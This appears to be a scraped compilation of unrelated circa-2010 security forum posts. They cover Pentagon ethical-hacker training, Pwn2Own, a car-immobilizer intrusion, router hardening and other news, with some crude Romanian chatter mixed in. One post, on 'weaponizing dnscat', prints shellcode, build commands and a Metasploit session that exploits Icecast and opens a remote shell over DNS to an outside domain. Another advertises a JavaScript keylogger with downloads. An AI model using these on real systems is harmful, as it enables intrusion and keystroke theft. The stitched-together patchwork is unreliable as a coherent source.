After years of building firewalls and other defenses against relentless hacker attacks, the Pentagon is going over to the dark side of computer warfare. But ethically, of course. The Defense Department, like most other large organizations, has recognized that no wall is high enough to keep out skilled and determined hackers for keeps. Instead, it has decided that in order to anticipate and thwart attacks, it needs to know what the hackers know. "More than 100 foreign intelligence organizations are trying to hack into U.S. systems," Deputy Defense Secretary William Lynn warned last month. "Some governments already have the capacity to disrupt elements of the U.S. information infrastructure." So the Pentagon recently modified its regulations to allow military computer experts to be trained in computer hacking, gaining the designation "certified ethical hackers." They'll join more than 20,000 other such good-guy hackers around the world who have earned that recognition since 2003 from the private International Council of E-Commerce Consultants (also known as the EC-Council). "We are creating cyber-bodyguards," says Sanjay Bavisi, president of the council. "We're not creating combat people." But as the world becomes increasingly interconnected via the Internet, the stakes have become too high to rely on static defenses alone to protect the immense flows of vital information that operate the world's financial, medical, governmental and infrastructure systems. "The bad guys already have the hacking technologies," Bavisi says. "We can say, 'Tough luck. The bad guys play by different rules, and you can't do anything about it, so just go lock your doors.' Or we can tell the good guys, 'We will arm you with the same knowledge as the bad guys, because to defeat the hacker you need to be able to think like one.'" Bavisi and the Pentagon are sensitive to the possibility that the tactics taught could be used for other purposes. "We're not training Department of Defense guys to become hackers and start hacking into China or any other countries," he says. Weeklong courses will train them in 150 hacking techniques and technologies, ranging from viruses, worms, sniffers and phishing to cyberwarfare. The cost of the course ranges from $450 to $2,500, depending on the training involved. Pentagon personnel "are not learning to hack," insists Air Force Lieut. Colonel Eric Butterbaugh. While the EC-Council calls it "certified ethical hacker" training, the U.S. military also calls it "penetration testing" or "red-teaming." These are proven military techniques that have been used for decades to hone war-fighting skills. The Air Force and Navy, for example, maintain "aggressor squadrons" of F-5 and MiG warplanes to give U.S. military pilots practice against the tactics of potential foes. And the Army's National Training Center at Fort Irwin, Calif., has long boasted a highly trained "op-for" — opposition force — that regular U.S. Army units engage in realistic war games. The program will be no cure-all for the Pentagon, whose networks are hacked hundreds of times a day. Adriel Desautels, the chief technology officer at Netragard LLC, a Massachusetts-based antihacking outfit, says that while "it's better than nothing," there are simply too many vulnerabilities to protect the Pentagon's estimated 10 million computers. Desautels likens it to 1,000 Dutch boys trying to stop water from flowing through a dike springing millions of leaks. "The threat is defined by the real black hats, and it's impossible to know what the black hats are researching," he says. "The number of vulnerabilities far exceeds what any white hats are going to discover." Both Butterbaugh and Bavisi say there are no concerns that military personnel trained as hackers might go rogue. "Computer-network-defense service providers," Butterbaugh says, "are vetted and have security clearances." Not only that, notes Bavisi, but those trained as ethical hackers have to sign a legally binding pledge that they will not engage in malicious hacking. "So far," he says, "we haven't had a single case where someone became a real hacker." Read more: Pentagon Trains Computer Hackers for Cyber-Defense - TIME

This is the video of the presentation titled "Internet Explorer turns your personal computer into a public file server" given by Jorge Luis Alvarez Medina at Blackhat 2010. In this presentation we will show how an attacker can read every file of your file system if you are using Internet Explorer. This attack leverages different design features of Internet Explorer entailing security risks that, while low if considered isolated, lead to interesting attack vectors when combined altogether. We will also disclose and demonstrate proof of concept code developed for the scenarios proposed. Internet Explorer turns your personal computer into a public file server (Blackhat 2010) Tutorial

l33t, vrei sa-ti dau la buci ?

Security company 3Com TippingPoint has jacked up to $100,000 (£65,000) the prize money on offer to anyone able to hack a range of browsers and mobile devices at the forthcoming CanSecWest security conference. Running for the fourth year at the event, $40,000 of the Pwn2Own contest pot will be on offer to entrants that successfully exploit security vulnerabilities to compromise the top four browsers, Internet Explorer, Mozilla Firefox, Google Chrome, and Safari, equivalent to $10,000 per browser. To win the money outright, the attacks on IE, Firefox and Chrome must work while running on a fully-patched Windows 7, while Safari will be attacked running on OS X Snow Leopard. Brownie points will be gained if the same flaw works on Vista and XP, although the assumption would be that this would be highly likely anyway. To make the contest tougher, attackers can't use third-party plug-ins such as Adobe Flash on day one of the event. These are often a soft underbelly, so excluding them raises the bar. Part two of the contest, account for the remaining $60,000, will ask contestants to successfully hack the Apple iPhone, Blackberry Bold 9700, the Nokia/Symbian S60, and an unspecified Motorola device running Android, with each worth $15,000. In both sections of the contest - browser and mobile device - bonus benefits will also be offered for exploits that show an unusual level of difficulty, and winners will get to keep the device on which the hack was carried out. Despite the eye-catching cash on offer, the contest is really a clever way of marketing TippingPoint's controversial Zero-Day Initiative (ZDI) scheme, under which researchers are paid to find exploits which are then added to the intrusion detection engines from which the company makes much of its living. At the time of its launch in 2005, the ZDI was criticised by rival vendors and some independent voices as tantamount to encouraging people to sell exploits uncovered to the highest bidder, in this case, 3Com's TippingPoint division. TippingPoint points out that all exploits discovered through the Pwn2Own contest will be disclosed to the vendors concerned as well as being added to its own database. Pwn2Own co-ordinator at TippingPoint, Aaron Portnoy, predicted that mobile devices would be particularly vulnerable while the easiest browser to crack would be IE on Windows 7. The browser that would resist attacks the most robustly would be Chrome thanks to its sandbox security feature which restricts what can happen inside a browser. "The discoveries and threats that come out of this will unequivocally show just how much ‘at risk' many businesses are," said Portnoy in his contest notes. More information on Pwn2Own can be found on TippingPoint's website. The contest will run at CanSecWest security conference held in Vancouver on 24 March. Hackers offered $100,000 for browser and phone exploits - Techworld.com

Hey all, I've been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or "weaponizing dnscat", as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a time, nor have I ever written shellcode, so this was an awesome learning experience. Most people start by writing shellcode that spawns a local shell; I decided to start with shellcode that implements a dnscat client in under 1024 bytes (for both Linux and Windows). Like I always say, go big or go home! If you just want to grab the files, here are some links: http://www.skullsecurity.org/blogdata/dnscat-shell-win32.asm http://www.skullsecurity.org/blogdata/dnscat-shell-win32 http://www.skullsecurity.org/blogdata/dnscat-shell-win32.h http://www.skullsecurity.org/blogdata/dnscat-shell-win32.rb http://www.skullsecurity.org/blogdata/dnscat-shell-linux.asm http://www.skullsecurity.org/blogdata/dnscat-shell-linux.h If you want to get your hands dirty, you can compile the source -- right now, it's only in svn: svn co http://svn.skullsecurity.org:81/ron/security/nbtool cd nbtool make That'll compile both the standard dnscat client/server and, if you have nasm installed, the Linux and Windows shellcodes. On Windows, you'll need nasm to assemble it. I installed Cygwin, but you can compile the Windows shellcode on Linux or vice versa if you prefer. The output will be in samples/shellcode-*/. A .h file containing the C version will be generated, as well: $ head -n3 dnscat-shell-test.h char shellcode[] = "\xe9\xa2\x01\x00\x00\x5d\x81\xec\x00\x04\x00\x00\xe8\x4e\x03\x00" "\x00\x31\xdb\x80\xc3\x09\x89\xef\xe8\x2e\x03\x00\x00\x80\xc3\x06" ... And, of course, the raw file is output (without an extension), that can be run through msfencode or embedded into a script: $ make [...] $ wc -c samples/shellcode-win32/dnscat-shell-win32 997 samples/shellcode-win32/dnscat-shell-win32 $ wc -c samples/shellcode-linux/dnscat-shell-linux 988 samples/shellcode-linux/dnscat-shell-linux Unless you want to be sending your cmd.exe (or sh) shell to skullseclabs.org, you'll have to modify the domain as well -- the very last line in the assembly code for both Windows and Linux is this: get_domain: call get_domain_top db 1, 'a' ; random db 12,'skullseclabs' ; <-- To modify domain, change this... db 3,'org' ; <-- and this. The number is the section length. db 0 The two lines with the domain have to be changed. The number preceding the name is, as the comment says, the length of the section ('skullseclabs' is 12 bytes, and 'org' is 3 bytes). This process is automated with the Metasploit payload, as you'll see. Encoding with msfencode msfencode from the Metasploit project is a beautiful utility. I highly recommend running shellcode through it before using it. The most useful aspect with shellcode is, at least to me, the ability to eliminate characters. So, if I need to get rid of \x00 (null) characters from my strings, it's as easy as: $ msfencode -b "\x00" < dnscat-shell-win32 > dnscat-shell-win32-encoded [*] x86/shikata_ga_nai succeeded with size 1024 (iteration=1) If you're planning on using this in, for example, Metasploit, you don't have to worry about the msfencode step -- it'll do that for you. Metasploit payload Speaking of metasploit, yes! I wrote a metasploit payload for dnscat. First, there are a number of caveats: * This is highly experimental * This doesn't have a proper "exitfunc" call -- it just returns and probably crashes the process * This is set up as a single stage, right now, and is 1000 or so bytes -- as a result, it won't work against most vulnerabilities * The dnscat server isn't part of Metasploit, yet, so you'll have to compile run it separately That being said, it also works great when it's usable. The target I use for testing is Icecast 2 version 2.0.0 (WARNING: don't install vulnerable software on anything important!), which is included on the SANS 560 and 504 CDs (thanks Ed!). It's free, GPL, reliable, and has 2000 bytes in which to stuff the payload. So, the steps you need to take are, 1. Install Icecast2 on your victim machine (Win32) 2. Download the experimental dnscat Metasploit module and put it in your Metasploit directory (modules/payloads/singles/windows/) 3. Fire up a dnscat server on your authoritative DNS server (dnscat --listen) -- see the dnscat wiki for more information 4. Run Metasploit (msfconsole) and enter the following commands: msf > use exploit/windows/http/icecast_header msf exploit(icecast_header) > set PAYLOAD windows/dnscat-shell-win32 PAYLOAD => windows/dnscat-shell-win32 msf exploit(icecast_header) > set RHOST 192.168.1.221 RHOST => 192.168.1.221 msf exploit(icecast_header) > set DOMAIN skullseclabs.org DOMAIN => skullseclabs.org msf exploit(icecast_header) > exploit [*] Exploit completed, but no session was created. Meanwhile, on your dnscat server, if all went well, you should see: $ sudo ./dnscat --listen Waiting for DNS requests for domain '*' on 0.0.0.0:53... Switching stream -> datagram Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\Icecast2 Win32> You can type commands in, and they'll run just like a normal shell. Be warned, though, that it is somewhat slow, due to the nature of going through DNS. Why bother? The big advantage to this over traditional shellcode is that no port, whether inbound or outbound, is required! As long as the server has a DNS server set that will perform recursive lookups, it'll work great! Feedback As I said, this is the first time I've ever written shellcode or x86. I'm sure there are lots of places where it could be significantly improved, and I'd love to hear feedback from the folks who really know what they're doing and can help me improve my code. Thanks! SkullSecurity Blog Archive Weaponizing dnscat with shellcode and Metasploit

More than 100 drivers in Austin, Texas found their cars disabled or the horns honking out of control, after an intruder ran amok in a web-based vehicle-immobilization system normally used to get the attention of consumers delinquent in their auto payments. Police with Austin’s High Tech Crime Unit on Wednesday arrested 20-year-old Omar Ramos-Lopez, a former Texas Auto Center employee who was laid off last month, and allegedly sought revenge by bricking the cars sold from the dealership’s four Austin-area lots. “We initially dismissed it as mechanical failure,” says Texas Auto Center manager Martin Garcia. “We started having a rash of up to a hundred customers at one time complaining. Some customers complained of the horns going off in the middle of the night. The only option they had was to remove the battery.” The dealership used a system called Webtech Plus as an alternative to repossessing vehicles that haven’t been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car’s ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The system will not stop a running vehicle. Texas Auto Center began fielding complaints from baffled customers the last week in February, many of whom wound up missing work, calling tow trucks or disconnecting their batteries to stop the honking. The troubles stopped five days later, when Texas Auto Center reset the Webtech Plus passwords for all its employee accounts, says Garcia. Then police obtained access logs from Pay Technologies, and traced the saboteur’s IP address to Ramos-Lopez’s AT&T internet service, according to a police affidavit filed in the case. Ramos-Lopez’s account had been closed when he was terminated from Texas Auto Center in a workforce reduction last month, but he allegedly got in through another employee’s account, Garcia says. At first, the intruder targeted vehicles by searching on the names of specific customers. Then he discovered he could pull up a database of all 1,100 Auto Center customers whose cars were equipped with the device. He started going down the list in alphabetical order, vandalizing the records, disabling the cars and setting off the horns. “Omar was pretty good with computers,” says Garcia. The incident is the first time an intruder has abused the no-start system, according to Jim Krueger, co-owner of Pay Technologies. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.” Krueger disputes that the horns were honking in the middle of the night; he says the horn honking can only be activated between 9 a.m. and 9 p.m. First rolled out about 10 years ago, remote immobilization systems are a controversial answer to delinquent car payments, with critics voicing concerns that debtors could suffer needless humiliation, or find themselves stranded during an emergency. Proponents say the systems let financers extend credit to consumers who might otherwise be ineligible for an auto loan. Austin police filed computer intrusion charges against Ramos-Lopez on Tuesday. Read More Hacker Disables More Than 100 Cars Remotely | Threat Level | Wired.com

Javascript Keylogger has been updated. The new release contains an a customized HTTP server that generates keystroke reports. From the readme: Start the server, view Test1.htm or Test2.htm, and type in one of the inputs to see it in action. Logged keystrokes are displayed in the console and written to a text file in the same directory as the server. Server settings are in the JavascriptKeyloggerServer.exe.config file. Download 1 Download 2

de unde apareti, bre? de cand m-am trezit pana acu am dat 5 ban-uri.

era o chestie sa postezi si parola

Breaching the network perimeter is much more difficult today than a few years ago. Most large enterprises have dedicated security teams running IDSs/IPSs, have network separation and event monitoring and alerting capabilities. This has thus caused a paradigm shift in the way hacking and hence penetration testing needs to be conducted. Hackers now are looking more at the users of the protected network as the attack vector, than the network perimeter itself. User environments are far more complex than a network perimeter. Hackers use browser vulnerabilities, and security threats in plugins such as Flash, ActiveX, Quicktime etc to compromise users remotely. As most of these users have unrestricted access to internal networks and resources in an organization, a hacker can thus penetrate deep into the network, without ever having to break through the perimeter. In this detailed video lecture, spanning over 2 hours, Dean De Beer talks about Client-side penetration testing methodologies and how it differs from the server and perimeter focused one. You can download the PDF of the talk here. Thanks for Dan Guido for posting this wonderful lecture on his site. I highly recommend SecurityTubers to watch this video! Client Side Penetration Testing Methodology Primer Tutorial

In the journal Nature Nanotechnology this week, the researchers describe a process that could become an alternative to conventional photolithography, which relies on light projected onto a photo-sensitive material, as people continue to forecast the demise of Moore's Law. That observation states that the number of transistors that can be placed on an integrated circuit doubles roughly every two years. Led by Caroline Ross and Karl Berggren, both engineering professors, the scientists used electron beam lithography to create nanoscale "posts" on a silicon chip. They then deposited copolymers--large molecules of two polymers with repeating structural units--on the chip. The copolymers spontaneously linked to the posts and arranged themselves into useful patterns. The polymers naturally want to separate from each other, thus causing them to arrange in predictable ways. (Berggren compares compares different polymer molecules to the characters played by Robert De Niro and Charles Grodin in "Midnight Run"--a bounty hunter and a white-collar criminal who are handcuffed together but can't stand each other.) A variety of patterns that can be used in circuit design could be achieved by changing the shape and position of the posts, the proportions of the polymers, and the length of the molecule chains, MIT said. When exposed to plasma, one polymer burns away, while the other turns to glass. The latter could work like a photoresist in optical lithography (a photoresist is a light-sensitive material onto which light is projected to form a pattern for the chip). The team is still working to produce functioning circuits in a prototype chip, and to create even smaller chip features with the copolymer technique. news.cnet.com

Social-networking sites have grown tremendously in popularity in recent years. Services such as Facebook and MySpace allow millions of users to create online profiles and to share details of their personal lives with vast networks of friends, and often, strangers. Inevitably, the disclosure of personal information has implications on users privacy: digital stalking and identity theft are some of the most common threats. Unfortunately, even sophisticated users who value privacy will often compromise it to improve their presence in the virtual world. They know that loss of control over their personal information poses a long-term threat, but they cannot assess the overall and long-term risk accurately enough to compare it to the short-term gain. Even worse, setting the privacy preferences in online services is often a complicated and time-consuming task that users usually skip. To address these issues, we are developing mechanisms and platforms to measure and monitor users privacy risks and help them easily manage their information sharing. In this talk, we will introduce our work in this area, and also discuss how it work can be incorporated with OpenSocial. Speaker Bio: Kun Liu, Ph.D., is a postdoctoral researcher at IBM Almaden Research Center. He received his Ph.D. from University of Maryland Baltimore County in 2007. His research interests include data mining, social-network analysis and text analytics. His featured work is in the area of privacy-preserving data mining, where he developed advanced privacy and risk management techniques that greatly facilitate the integration, sharing and analysis of data owned by different parties without compromising their privacy. More information about him can be found at Kun Liu at University of Maryland Baltimore County (UMBC) Towards Privacy Aware OpenSocial Applications (IBM Research) Tutorial

A more accurate title for this article would have been how to increase security on a Cisco border router, but that's too long. This article assumes some familiarity with Cisco routers. If you're not familiar with Cisco IOS command line interaction, consult reference [2] below, or Cisco documentation. Thoroughly securing a Cisco router (or any router) is a topic that can require its own book(s) (see the references at the end of this article). I will cover the basics here though. The low hanging fruit. Before you begin, keep a copy of your present, working router configuration in pristine condition. Save the edited configuration to a new file. The same goes for IOS code. Make sure you have a full copy of the version you're running before you upgrade. 1. Upgrade IOS. Upgrade to the latest stable code version available for your router. Like other operating systems, Cisco IOS is upgraded for various reasons including to fix security flaws. How to do that is beyond the scope of this article but you can find more info here: Software Upgrade Procedure - Cisco Systems 2. Generate an rsa crypto-key. If your router code supports cryptography, enter the following commands to create a crypto-key for later use with SSH (if your router does not support cryptography, you will receive an error when you try to enter the commands): hostname [enter a hostname for your router] ip domain-name [enter your domain name i.e. mydomain.com] crypto key generate rsa If it works, the router will process the command for a moment then ask you how many bits the modulus should be. If permitted by you local laws regarding cryptograpy, enter 1024. If not, enter the largest number you are entitled to use. 3. Disable unneeded services. There are many services that are enabled by default on Cisco routers. Each can provide information an attacker can use. There is a free utility called Yersinia that can be used to obtain Cisco Discovery Protocol (CDP) information over the Internet for example. Global commands: no service tcp-small-servers no service udp-small-servers no service dhcp no ip bootp server no service finger no ip http server [you may not want to enter this command if you use Adaptive Security Device Manager (ASDM) to manager your router over HTTP] no ip http secure-server [you may not want to enter this command if you use ASDM to manager your router over HTTPS] no snmp-server no cdp run no service config no ip gratuitous-arps no ip source-route ip options drop Interface commands (enter these on each interface in use): no ip directed-broadcast no ip unreachables no ip redirects no ip mask-reply no ip proxy-arp In addition to the above, the shutdown command should be applied to interfaces that are not in use. 4. Enable 'good' services. Some beneficial services are not enabled by default. We'll turn them on: service tcp-keepalives-in service tcp-keepalives-out service timestamps debug datetime msec show-timezone localtime service timestamps log datetime msec show-timezone localtime 5. Secure local and remote access. Console line configuration: line con 0 exec-timeout 5 0 login Auxiliary line configuration (should be disabled unless needed for remote access): line aux 0 no exec exec-timeout 0 10 transport input none VTY lines (virtual lines for remote access over the network): line vty 0 4 exec-timeout 5 0 login transport input telnet ssh (If you can configure SSH for remote access, it is recommended that you remove the word telnet from the above command and only use SSH for remote access.) 6. Set and secure passwords. service password-encryption enable secret 0 [enter your password here] Console line line con 0 password [enter your password here] Auxiliary Line line aux 0 password [enter your password here] 7. Enable and configure logging. Ideally, logs should be sent to a hardened syslog server so they cannot be tampered with and so they are more permanent. Local logs are deleted whenever the router is rebooted. We will configure local logging here though. logging enable logging buffered 16000 logging console critical logging trap informational 8. Other measures. Additional measures you can take include: 8.a. Drop bogon and Martian traffic. Handling of bogon and Martian addresses. Bogon addresses are addresses that have not been issued by the IANA, so they should not appear on the Internet. Martians are reserved addresses and they also should not appear on the Internet. If either does appear, it is either coming from a mis-configured router or device, or it is an attack attempt of some kind (they are fake or 'spoofed' addresses). There are several ways to handle these. Team Cymru's site has more information about bogon and Martian addresses. [3] 8.a.1. Null Routing - You could null route them (create a static mapping sending all bogon and Martian addresses not in use on the router to the null interface). This is my favorite method. It drops the traffic with minimal processing. 8.a.2. Use an Access Control Lists (ACLs) - Set up an ACL to drop and log each violation. Although this method provides more information, it also uses up more processing power. Since one reason you may receive spoofed packets is in conjunction with a Denial of Service (DoS) attack of some kind, it seems prudent to minimize the burden on the processor, hence the suggested method above. 8.a.3. Verify unicast reverse-path - To use this method, configure Cisco express forwarding globally using the ip cef command, then run the command ip verify unicast reverse-path on each interface that faces the Internet. Although easy to configure, and easy on the processor, I'm not sure how well it works with a single static default route as is the case for most small organizations. I'd like to hear the thoughts of some of you Cisco pro's out there about whether it works on a small network (i.e. one not running Border Gateway Protocol (BGP). 8.b. Configure Authentication, Authorization and Accounging (AAA) - Configure the American Automotive Association... Just seeing if you're still awake! Configure AAA, even if only used locally. It allows for more granularity of access and logging of activities. You can, for example, have a log entry created for each command a user enters. Very handy for finding configuration mistakes or typo's or correcting the nastiness of an intruder. aaa new-model aaa authentication login default local aaa authorization commands 15 default local 8.c. Access Control Lists - Control the flow of traffic through the router with ACLs. For example, traffic from the inside interface of the router should not come in to the router from the Internet. Filter for that using an ACL. ACL configuration has to be done for your specific network. See references [3] and [4] below for more. 9. Why this article? Quite often, at the end of a 'teaser' article like this, the author tries to sell you something. I'm not selling you anything! I want to make the Internet a safer place, and I want to make that easy for you. There are several free utilities that can help you secure your router including: Router Administration Tool (RAT): Router Audit Tool (RAT) .: CIS Knowledge Base Cisco AutoSecure: AutoSecure and my project, BRST - Border Router Security Tool, SourceForge https://sourceforge.net/projects/borderroutersec/ Of the three listed above, only the BRST is open source. RAT is available for free, but is proprietary. Cisco AutoSecure is 'free' but is not available for all router models and IOS versions and is proprietary. Compare, contrast, play, provide feedback on all three. Use great caution on production routers though! Thanks for your time! [1] NSA/SNAC Router Security Configuration Guide, Executive Summary http://www.nsa.gov/ia/_files/routers/cisco_exec_sum.pdf [2] NSA/SNAC Router Security Configuration Guide 1.1c http://www.nsa.gov/ia/_files/routers/C4-040R-02.pdf [3] Secure IOS Template v6.2 01 Feb 2010, Team Cymru Secure IOS Template v6.2 01 FEB 2010 deitrich noc@cymru.com [4] Cisco IOS Security Configuration Guide, Release 12.4 Cisco IOS Security Configuration Guide, Release 12.4 [support] - Cisco Systems [5] Hardening Cisco Routers, By Thomas Akin, O'Reilly, 2002 [6] BRST - Border Router Security Tool, SourceForge Project https://sourceforge.net/projects/borderroutersec/ [7] BRST - Border Router Security Tool Questionnaire, SourceForge BRST - Border Router Security Tool Questionnaire source : https://www.infosecisland.com/blogview/3309-How-to-secure-a-Cisco-router.html